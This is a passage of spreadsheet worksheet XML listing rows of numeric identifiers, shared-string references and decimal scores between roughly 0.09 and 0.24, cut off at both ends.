        <v>1.0</v>
      </c>
      <c r="E22915" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22915" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22916" ht="15.75" customHeight="1">
      <c r="A22916" s="1">
        <v>32680.0</v>
      </c>
      <c r="B22916" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C22916" s="2" t="s">
        <v>22130</v>
      </c>
      <c r="D22916" s="2">
        <v>1.0</v>
      </c>
      <c r="E22916" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22916" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22917" ht="15.75" customHeight="1">
      <c r="A22917" s="1">
        <v>223.0</v>
      </c>
      <c r="B22917" s="2">
        <v>1.4667916E7</v>
      </c>
      <c r="C22917" s="2" t="s">
        <v>22131</v>
      </c>
      <c r="D22917" s="2">
        <v>1.0</v>
      </c>
      <c r="E22917" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22917" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22918" ht="15.75" customHeight="1">
      <c r="A22918" s="1">
        <v>1016.0</v>
      </c>
      <c r="B22918" s="2">
        <v>2.3143355E7</v>
      </c>
      <c r="C22918" s="2" t="s">
        <v>22132</v>
      </c>
      <c r="D22918" s="2">
        <v>1.0</v>
      </c>
      <c r="E22918" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22918" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22919" ht="15.75" customHeight="1">
      <c r="A22919" s="1">
        <v>1992.0</v>
      </c>
      <c r="B22919" s="2">
        <v>3.0531423E7</v>
      </c>
      <c r="C22919" s="2" t="s">
        <v>22133</v>
      </c>
      <c r="D22919" s="2">
        <v>1.0</v>
      </c>
      <c r="E22919" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22919" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22920" ht="15.75" customHeight="1">
      <c r="A22920" s="1">
        <v>6716.0</v>
      </c>
      <c r="B22920" s="2">
        <v>4.9274009E7</v>
      </c>
      <c r="C22920" s="2" t="s">
        <v>22134</v>
      </c>
      <c r="D22920" s="2">
        <v>1.0</v>
      </c>
      <c r="E22920" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22920" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22921" ht="15.75" customHeight="1">
      <c r="A22921" s="1">
        <v>10517.0</v>
      </c>
      <c r="B22921" s="2">
        <v>1.1814396E7</v>
      </c>
      <c r="C22921" s="2" t="s">
        <v>22135</v>
      </c>
      <c r="D22921" s="2">
        <v>1.0</v>
      </c>
      <c r="E22921" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22921" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22922" ht="15.75" customHeight="1">
      <c r="A22922" s="1">
        <v>13540.0</v>
      </c>
      <c r="B22922" s="2">
        <v>3.5619944E7</v>
      </c>
      <c r="C22922" s="2" t="s">
        <v>22136</v>
      </c>
      <c r="D22922" s="2">
        <v>1.0</v>
      </c>
      <c r="E22922" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22922" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22923" ht="15.75" customHeight="1">
      <c r="A22923" s="1">
        <v>14295.0</v>
      </c>
      <c r="B22923" s="2">
        <v>3.8568074E7</v>
      </c>
      <c r="C22923" s="2" t="s">
        <v>22137</v>
      </c>
      <c r="D22923" s="2">
        <v>1.0</v>
      </c>
      <c r="E22923" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22923" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22924" ht="15.75" customHeight="1">
      <c r="A22924" s="1">
        <v>19535.0</v>
      </c>
      <c r="B22924" s="2">
        <v>5.5998826E7</v>
      </c>
      <c r="C22924" s="2" t="s">
        <v>22138</v>
      </c>
      <c r="D22924" s="2">
        <v>1.0</v>
      </c>
      <c r="E22924" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22924" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22925" ht="15.75" customHeight="1">
      <c r="A22925" s="1">
        <v>24097.0</v>
      </c>
      <c r="B22925" s="2">
        <v>9822346.0</v>
      </c>
      <c r="C22925" s="2" t="s">
        <v>22139</v>
      </c>
      <c r="D22925" s="2">
        <v>1.0</v>
      </c>
      <c r="E22925" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22925" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22926" ht="15.75" customHeight="1">
      <c r="A22926" s="1">
        <v>29452.0</v>
      </c>
      <c r="B22926" s="2">
        <v>3.2242295E7</v>
      </c>
      <c r="C22926" s="2" t="s">
        <v>22140</v>
      </c>
      <c r="D22926" s="2">
        <v>1.0</v>
      </c>
      <c r="E22926" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22926" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22927" ht="15.75" customHeight="1">
      <c r="A22927" s="1">
        <v>31097.0</v>
      </c>
      <c r="B22927" s="2">
        <v>4.8505825E7</v>
      </c>
      <c r="C22927" s="2" t="s">
        <v>22141</v>
      </c>
      <c r="D22927" s="2">
        <v>1.0</v>
      </c>
      <c r="E22927" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22927" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22928" ht="15.75" customHeight="1">
      <c r="A22928" s="1">
        <v>32115.0</v>
      </c>
      <c r="B22928" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C22928" s="2" t="s">
        <v>22142</v>
      </c>
      <c r="D22928" s="2">
        <v>1.0</v>
      </c>
      <c r="E22928" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22928" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="22929" ht="15.75" customHeight="1">
      <c r="A22929" s="1">
        <v>197.0</v>
      </c>
      <c r="B22929" s="2">
        <v>1.4435257E7</v>
      </c>
      <c r="C22929" s="2" t="s">
        <v>22143</v>
      </c>
      <c r="D22929" s="2">
        <v>1.0</v>
      </c>
      <c r="E22929" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22929" s="2">
        <v>0.09291187739463601</v>
      </c>
    </row>
    <row r="22930" ht="15.75" customHeight="1">
      <c r="A22930" s="1">
        <v>6515.0</v>
      </c>
      <c r="B22930" s="2">
        <v>4.8784009E7</v>
      </c>
      <c r="C22930" s="2" t="s">
        <v>22144</v>
      </c>
      <c r="D22930" s="2">
        <v>1.0</v>
      </c>
      <c r="E22930" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22930" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="22931" ht="15.75" customHeight="1">
      <c r="A22931" s="1">
        <v>14972.0</v>
      </c>
      <c r="B22931" s="2">
        <v>4.1359257E7</v>
      </c>
      <c r="C22931" s="2" t="s">
        <v>22145</v>
      </c>
      <c r="D22931" s="2">
        <v>1.0</v>
      </c>
      <c r="E22931" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22931" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="22932" ht="15.75" customHeight="1">
      <c r="A22932" s="1">
        <v>26551.0</v>
      </c>
      <c r="B22932" s="2">
        <v>1.7793623E7</v>
      </c>
      <c r="C22932" s="2" t="s">
        <v>22146</v>
      </c>
      <c r="D22932" s="2">
        <v>1.0</v>
      </c>
      <c r="E22932" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22932" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="22933" ht="15.75" customHeight="1">
      <c r="A22933" s="1">
        <v>417.0</v>
      </c>
      <c r="B22933" s="2">
        <v>1.6786672E7</v>
      </c>
      <c r="C22933" s="2" t="s">
        <v>22147</v>
      </c>
      <c r="D22933" s="2">
        <v>1.0</v>
      </c>
      <c r="E22933" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22933" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="22934" ht="15.75" customHeight="1">
      <c r="A22934" s="1">
        <v>1815.0</v>
      </c>
      <c r="B22934" s="2">
        <v>2.9229537E7</v>
      </c>
      <c r="C22934" s="2" t="s">
        <v>22148</v>
      </c>
      <c r="D22934" s="2">
        <v>1.0</v>
      </c>
      <c r="E22934" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22934" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="22935" ht="15.75" customHeight="1">
      <c r="A22935" s="1">
        <v>1444.0</v>
      </c>
      <c r="B22935" s="2">
        <v>2.6731048E7</v>
      </c>
      <c r="C22935" s="2" t="s">
        <v>22149</v>
      </c>
      <c r="D22935" s="2">
        <v>1.0</v>
      </c>
      <c r="E22935" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22935" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="22936" ht="15.75" customHeight="1">
      <c r="A22936" s="1">
        <v>12349.0</v>
      </c>
      <c r="B22936" s="2">
        <v>2.8661021E7</v>
      </c>
      <c r="C22936" s="2" t="s">
        <v>22150</v>
      </c>
      <c r="D22936" s="2">
        <v>1.0</v>
      </c>
      <c r="E22936" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22936" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="22937" ht="15.75" customHeight="1">
      <c r="A22937" s="1">
        <v>2841.0</v>
      </c>
      <c r="B22937" s="2">
        <v>3.5448629E7</v>
      </c>
      <c r="C22937" s="2" t="s">
        <v>22151</v>
      </c>
      <c r="D22937" s="2">
        <v>1.0</v>
      </c>
      <c r="E22937" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22937" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22938" ht="15.75" customHeight="1">
      <c r="A22938" s="1">
        <v>3314.0</v>
      </c>
      <c r="B22938" s="2">
        <v>3.7605228E7</v>
      </c>
      <c r="C22938" s="2" t="s">
        <v>22152</v>
      </c>
      <c r="D22938" s="2">
        <v>1.0</v>
      </c>
      <c r="E22938" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22938" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22939" ht="15.75" customHeight="1">
      <c r="A22939" s="1">
        <v>5317.0</v>
      </c>
      <c r="B22939" s="2">
        <v>4.5284136E7</v>
      </c>
      <c r="C22939" s="2" t="s">
        <v>22153</v>
      </c>
      <c r="D22939" s="2">
        <v>1.0</v>
      </c>
      <c r="E22939" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22939" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22940" ht="15.75" customHeight="1">
      <c r="A22940" s="1">
        <v>7096.0</v>
      </c>
      <c r="B22940" s="2">
        <v>5.031319E7</v>
      </c>
      <c r="C22940" s="2" t="s">
        <v>22154</v>
      </c>
      <c r="D22940" s="2">
        <v>1.0</v>
      </c>
      <c r="E22940" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22940" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22941" ht="15.75" customHeight="1">
      <c r="A22941" s="1">
        <v>8685.0</v>
      </c>
      <c r="B22941" s="2">
        <v>5.440523E7</v>
      </c>
      <c r="C22941" s="2" t="s">
        <v>22155</v>
      </c>
      <c r="D22941" s="2">
        <v>1.0</v>
      </c>
      <c r="E22941" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22941" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22942" ht="15.75" customHeight="1">
      <c r="A22942" s="1">
        <v>9289.0</v>
      </c>
      <c r="B22942" s="2">
        <v>5.5544716E7</v>
      </c>
      <c r="C22942" s="2" t="s">
        <v>22156</v>
      </c>
      <c r="D22942" s="2">
        <v>1.0</v>
      </c>
      <c r="E22942" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22942" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22943" ht="15.75" customHeight="1">
      <c r="A22943" s="1">
        <v>9811.0</v>
      </c>
      <c r="B22943" s="2">
        <v>5.6611893E7</v>
      </c>
      <c r="C22943" s="2" t="s">
        <v>22157</v>
      </c>
      <c r="D22943" s="2">
        <v>1.0</v>
      </c>
      <c r="E22943" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22943" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22944" ht="15.75" customHeight="1">
      <c r="A22944" s="1">
        <v>12044.0</v>
      </c>
      <c r="B22944" s="2">
        <v>2.6333762E7</v>
      </c>
      <c r="C22944" s="2" t="s">
        <v>22158</v>
      </c>
      <c r="D22944" s="2">
        <v>1.0</v>
      </c>
      <c r="E22944" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22944" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22945" ht="15.75" customHeight="1">
      <c r="A22945" s="1">
        <v>15017.0</v>
      </c>
      <c r="B22945" s="2">
        <v>4.1535538E7</v>
      </c>
      <c r="C22945" s="2" t="s">
        <v>22159</v>
      </c>
      <c r="D22945" s="2">
        <v>1.0</v>
      </c>
      <c r="E22945" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22945" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22946" ht="15.75" customHeight="1">
      <c r="A22946" s="1">
        <v>15546.0</v>
      </c>
      <c r="B22946" s="2">
        <v>4.3397458E7</v>
      </c>
      <c r="C22946" s="2" t="s">
        <v>22160</v>
      </c>
      <c r="D22946" s="2">
        <v>1.0</v>
      </c>
      <c r="E22946" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22946" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22947" ht="15.75" customHeight="1">
      <c r="A22947" s="1">
        <v>16417.0</v>
      </c>
      <c r="B22947" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C22947" s="2" t="s">
        <v>22161</v>
      </c>
      <c r="D22947" s="2">
        <v>1.0</v>
      </c>
      <c r="E22947" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22947" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22948" ht="15.75" customHeight="1">
      <c r="A22948" s="1">
        <v>16487.0</v>
      </c>
      <c r="B22948" s="2">
        <v>4.653895E7</v>
      </c>
      <c r="C22948" s="2" t="s">
        <v>22162</v>
      </c>
      <c r="D22948" s="2">
        <v>1.0</v>
      </c>
      <c r="E22948" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22948" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22949" ht="15.75" customHeight="1">
      <c r="A22949" s="1">
        <v>17249.0</v>
      </c>
      <c r="B22949" s="2">
        <v>4.9091549E7</v>
      </c>
      <c r="C22949" s="2" t="s">
        <v>22163</v>
      </c>
      <c r="D22949" s="2">
        <v>1.0</v>
      </c>
      <c r="E22949" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22949" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22950" ht="15.75" customHeight="1">
      <c r="A22950" s="1">
        <v>19001.0</v>
      </c>
      <c r="B22950" s="2">
        <v>5.446262E7</v>
      </c>
      <c r="C22950" s="2" t="s">
        <v>22164</v>
      </c>
      <c r="D22950" s="2">
        <v>1.0</v>
      </c>
      <c r="E22950" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22950" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22951" ht="15.75" customHeight="1">
      <c r="A22951" s="1">
        <v>20762.0</v>
      </c>
      <c r="B22951" s="2">
        <v>1.492104E7</v>
      </c>
      <c r="C22951" s="2" t="s">
        <v>22165</v>
      </c>
      <c r="D22951" s="2">
        <v>1.0</v>
      </c>
      <c r="E22951" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22951" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22952" ht="15.75" customHeight="1">
      <c r="A22952" s="1">
        <v>21573.0</v>
      </c>
      <c r="B22952" s="2">
        <v>2.3808007E7</v>
      </c>
      <c r="C22952" s="2" t="s">
        <v>22166</v>
      </c>
      <c r="D22952" s="2">
        <v>1.0</v>
      </c>
      <c r="E22952" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22952" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22953" ht="15.75" customHeight="1">
      <c r="A22953" s="1">
        <v>25046.0</v>
      </c>
      <c r="B22953" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C22953" s="2" t="s">
        <v>22167</v>
      </c>
      <c r="D22953" s="2">
        <v>1.0</v>
      </c>
      <c r="E22953" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22953" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22954" ht="15.75" customHeight="1">
      <c r="A22954" s="1">
        <v>25514.0</v>
      </c>
      <c r="B22954" s="2">
        <v>1.4171067E7</v>
      </c>
      <c r="C22954" s="2" t="s">
        <v>22168</v>
      </c>
      <c r="D22954" s="2">
        <v>1.0</v>
      </c>
      <c r="E22954" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22954" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22955" ht="15.75" customHeight="1">
      <c r="A22955" s="1">
        <v>26338.0</v>
      </c>
      <c r="B22955" s="2">
        <v>1.6753676E7</v>
      </c>
      <c r="C22955" s="2" t="s">
        <v>22169</v>
      </c>
      <c r="D22955" s="2">
        <v>1.0</v>
      </c>
      <c r="E22955" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22955" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22956" ht="15.75" customHeight="1">
      <c r="A22956" s="1">
        <v>27936.0</v>
      </c>
      <c r="B22956" s="2">
        <v>2.3808006E7</v>
      </c>
      <c r="C22956" s="2" t="s">
        <v>22170</v>
      </c>
      <c r="D22956" s="2">
        <v>1.0</v>
      </c>
      <c r="E22956" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22956" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22957" ht="15.75" customHeight="1">
      <c r="A22957" s="1">
        <v>27937.0</v>
      </c>
      <c r="B22957" s="2">
        <v>2.3808006E7</v>
      </c>
      <c r="C22957" s="2" t="s">
        <v>22171</v>
      </c>
      <c r="D22957" s="2">
        <v>1.0</v>
      </c>
      <c r="E22957" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22957" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22958" ht="15.75" customHeight="1">
      <c r="A22958" s="1">
        <v>28997.0</v>
      </c>
      <c r="B22958" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C22958" s="2" t="s">
        <v>22172</v>
      </c>
      <c r="D22958" s="2">
        <v>1.0</v>
      </c>
      <c r="E22958" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22958" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22959" ht="15.75" customHeight="1">
      <c r="A22959" s="1">
        <v>29962.0</v>
      </c>
      <c r="B22959" s="2">
        <v>3607763.0</v>
      </c>
      <c r="C22959" s="2" t="s">
        <v>22173</v>
      </c>
      <c r="D22959" s="2">
        <v>1.0</v>
      </c>
      <c r="E22959" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22959" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22960" ht="15.75" customHeight="1">
      <c r="A22960" s="1">
        <v>30856.0</v>
      </c>
      <c r="B22960" s="2">
        <v>4.6153446E7</v>
      </c>
      <c r="C22960" s="2" t="s">
        <v>22174</v>
      </c>
      <c r="D22960" s="2">
        <v>1.0</v>
      </c>
      <c r="E22960" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22960" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="22961" ht="15.75" customHeight="1">
      <c r="A22961" s="1">
        <v>3390.0</v>
      </c>
      <c r="B22961" s="2">
        <v>3.79619E7</v>
      </c>
      <c r="C22961" s="2" t="s">
        <v>22175</v>
      </c>
      <c r="D22961" s="2">
        <v>1.0</v>
      </c>
      <c r="E22961" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22961" s="2">
        <v>0.09226190476190474</v>
      </c>
    </row>
    <row r="22962" ht="15.75" customHeight="1">
      <c r="A22962" s="1">
        <v>15921.0</v>
      </c>
      <c r="B22962" s="2">
        <v>4.4679477E7</v>
      </c>
      <c r="C22962" s="2" t="s">
        <v>22176</v>
      </c>
      <c r="D22962" s="2">
        <v>1.0</v>
      </c>
      <c r="E22962" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22962" s="2">
        <v>0.09133709981167606</v>
      </c>
    </row>
    <row r="22963" ht="15.75" customHeight="1">
      <c r="A22963" s="1">
        <v>19576.0</v>
      </c>
      <c r="B22963" s="2">
        <v>5.6151652E7</v>
      </c>
      <c r="C22963" s="2" t="s">
        <v>22177</v>
      </c>
      <c r="D22963" s="2">
        <v>1.0</v>
      </c>
      <c r="E22963" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22963" s="2">
        <v>0.0911949685534591</v>
      </c>
    </row>
    <row r="22964" ht="15.75" customHeight="1">
      <c r="A22964" s="1">
        <v>2678.0</v>
      </c>
      <c r="B22964" s="2">
        <v>3.4797421E7</v>
      </c>
      <c r="C22964" s="2" t="s">
        <v>22178</v>
      </c>
      <c r="D22964" s="2">
        <v>1.0</v>
      </c>
      <c r="E22964" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22964" s="2">
        <v>0.09081196581196578</v>
      </c>
    </row>
    <row r="22965" ht="15.75" customHeight="1">
      <c r="A22965" s="1">
        <v>9810.0</v>
      </c>
      <c r="B22965" s="2">
        <v>5.6600734E7</v>
      </c>
      <c r="C22965" s="2" t="s">
        <v>22179</v>
      </c>
      <c r="D22965" s="2">
        <v>1.0</v>
      </c>
      <c r="E22965" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22965" s="2">
        <v>0.09081196581196578</v>
      </c>
    </row>
    <row r="22966" ht="15.75" customHeight="1">
      <c r="A22966" s="1">
        <v>10328.0</v>
      </c>
      <c r="B22966" s="2">
        <v>5.7712777E7</v>
      </c>
      <c r="C22966" s="2" t="s">
        <v>22180</v>
      </c>
      <c r="D22966" s="2">
        <v>1.0</v>
      </c>
      <c r="E22966" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22966" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22967" ht="15.75" customHeight="1">
      <c r="A22967" s="1">
        <v>11875.0</v>
      </c>
      <c r="B22967" s="2">
        <v>2.4976047E7</v>
      </c>
      <c r="C22967" s="2" t="s">
        <v>22181</v>
      </c>
      <c r="D22967" s="2">
        <v>1.0</v>
      </c>
      <c r="E22967" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22967" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22968" ht="15.75" customHeight="1">
      <c r="A22968" s="1">
        <v>20696.0</v>
      </c>
      <c r="B22968" s="2">
        <v>1.4524656E7</v>
      </c>
      <c r="C22968" s="2" t="s">
        <v>22182</v>
      </c>
      <c r="D22968" s="2">
        <v>1.0</v>
      </c>
      <c r="E22968" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22968" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22969" ht="15.75" customHeight="1">
      <c r="A22969" s="1">
        <v>20956.0</v>
      </c>
      <c r="B22969" s="2">
        <v>1.6664286E7</v>
      </c>
      <c r="C22969" s="2" t="s">
        <v>22183</v>
      </c>
      <c r="D22969" s="2">
        <v>1.0</v>
      </c>
      <c r="E22969" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22969" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22970" ht="15.75" customHeight="1">
      <c r="A22970" s="1">
        <v>26321.0</v>
      </c>
      <c r="B22970" s="2">
        <v>1.6664285E7</v>
      </c>
      <c r="C22970" s="2" t="s">
        <v>22183</v>
      </c>
      <c r="D22970" s="2">
        <v>1.0</v>
      </c>
      <c r="E22970" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22970" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22971" ht="15.75" customHeight="1">
      <c r="A22971" s="1">
        <v>31612.0</v>
      </c>
      <c r="B22971" s="2">
        <v>5143706.0</v>
      </c>
      <c r="C22971" s="2" t="s">
        <v>22184</v>
      </c>
      <c r="D22971" s="2">
        <v>1.0</v>
      </c>
      <c r="E22971" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22971" s="2">
        <v>0.09064327485380116</v>
      </c>
    </row>
    <row r="22972" ht="15.75" customHeight="1">
      <c r="A22972" s="1">
        <v>21993.0</v>
      </c>
      <c r="B22972" s="2">
        <v>2.952458E7</v>
      </c>
      <c r="C22972" s="2" t="s">
        <v>22185</v>
      </c>
      <c r="D22972" s="2">
        <v>1.0</v>
      </c>
      <c r="E22972" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22972" s="2">
        <v>0.09064327485380115</v>
      </c>
    </row>
    <row r="22973" ht="15.75" customHeight="1">
      <c r="A22973" s="1">
        <v>25342.0</v>
      </c>
      <c r="B22973" s="2">
        <v>1.3538359E7</v>
      </c>
      <c r="C22973" s="2" t="s">
        <v>22186</v>
      </c>
      <c r="D22973" s="2">
        <v>1.0</v>
      </c>
      <c r="E22973" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22973" s="2">
        <v>0.09041394335511982</v>
      </c>
    </row>
    <row r="22974" ht="15.75" customHeight="1">
      <c r="A22974" s="1">
        <v>30039.0</v>
      </c>
      <c r="B22974" s="2">
        <v>3.6211665E7</v>
      </c>
      <c r="C22974" s="2" t="s">
        <v>22187</v>
      </c>
      <c r="D22974" s="2">
        <v>1.0</v>
      </c>
      <c r="E22974" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22974" s="2">
        <v>0.2392592592592593</v>
      </c>
    </row>
    <row r="22975" ht="15.75" customHeight="1">
      <c r="A22975" s="1">
        <v>22844.0</v>
      </c>
      <c r="B22975" s="2">
        <v>4.6754101E7</v>
      </c>
      <c r="C22975" s="2" t="s">
        <v>22189</v>
      </c>
      <c r="D22975" s="2">
        <v>1.0</v>
      </c>
      <c r="E22975" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22975" s="2">
        <v>0.2342592592592593</v>
      </c>
    </row>
    <row r="22976" ht="15.75" customHeight="1">
      <c r="A22976" s="1">
        <v>26288.0</v>
      </c>
      <c r="B22976" s="2">
        <v>1.6464152E7</v>
      </c>
      <c r="C22976" s="2" t="s">
        <v>22190</v>
      </c>
      <c r="D22976" s="2">
        <v>1.0</v>
      </c>
      <c r="E22976" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22976" s="2">
        <v>0.2305936073059361</v>
      </c>
    </row>
    <row r="22977" ht="15.75" customHeight="1">
      <c r="A22977" s="1">
        <v>27158.0</v>
      </c>
      <c r="B22977" s="2">
        <v>2.0809486E7</v>
      </c>
      <c r="C22977" s="2" t="s">
        <v>22191</v>
      </c>
      <c r="D22977" s="2">
        <v>1.0</v>
      </c>
      <c r="E22977" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22977" s="2">
        <v>0.2282051282051283</v>
      </c>
    </row>
    <row r="22978" ht="15.75" customHeight="1">
      <c r="A22978" s="1">
        <v>26713.0</v>
      </c>
      <c r="B22978" s="2">
        <v>1.8221652E7</v>
      </c>
      <c r="C22978" s="2" t="s">
        <v>22192</v>
      </c>
      <c r="D22978" s="2">
        <v>1.0</v>
      </c>
      <c r="E22978" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22978" s="2">
        <v>0.2276995305164319</v>
      </c>
    </row>
    <row r="22979" ht="15.75" customHeight="1">
      <c r="A22979" s="1">
        <v>28672.0</v>
      </c>
      <c r="B22979" s="2">
        <v>2.7533656E7</v>
      </c>
      <c r="C22979" s="2" t="s">
        <v>22191</v>
      </c>
      <c r="D22979" s="2">
        <v>1.0</v>
      </c>
      <c r="E22979" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22979" s="2">
        <v>0.2247863247863248</v>
      </c>
    </row>
    <row r="22980" ht="15.75" customHeight="1">
      <c r="A22980" s="1">
        <v>21110.0</v>
      </c>
      <c r="B22980" s="2">
        <v>1.8221653E7</v>
      </c>
      <c r="C22980" s="2" t="s">
        <v>22192</v>
      </c>
      <c r="D22980" s="2">
        <v>1.0</v>
      </c>
      <c r="E22980" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22980" s="2">
        <v>0.2214397496087637</v>
      </c>
    </row>
    <row r="22981" ht="15.75" customHeight="1">
      <c r="A22981" s="1">
        <v>24008.0</v>
      </c>
      <c r="B22981" s="2">
        <v>9281900.0</v>
      </c>
      <c r="C22981" s="2" t="s">
        <v>22193</v>
      </c>
      <c r="D22981" s="2">
        <v>1.0</v>
      </c>
      <c r="E22981" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F22981" s="2">
        <v>0.2213541666666667</v>
      </c>
    </row>
    <row r="22982" ht="15.75" customHeight="1">
      <c r="A22982" s="1">
        <v>33420.0</v>
      </c>
      <c r="B22982" s="2">
        <v>7759600.0</v>
      </c>
      <c r="C22982" s="2" t="s">
        <v>22194</v>
      </c>
      <c r="D22982" s="2">
        <v>1.0</v>
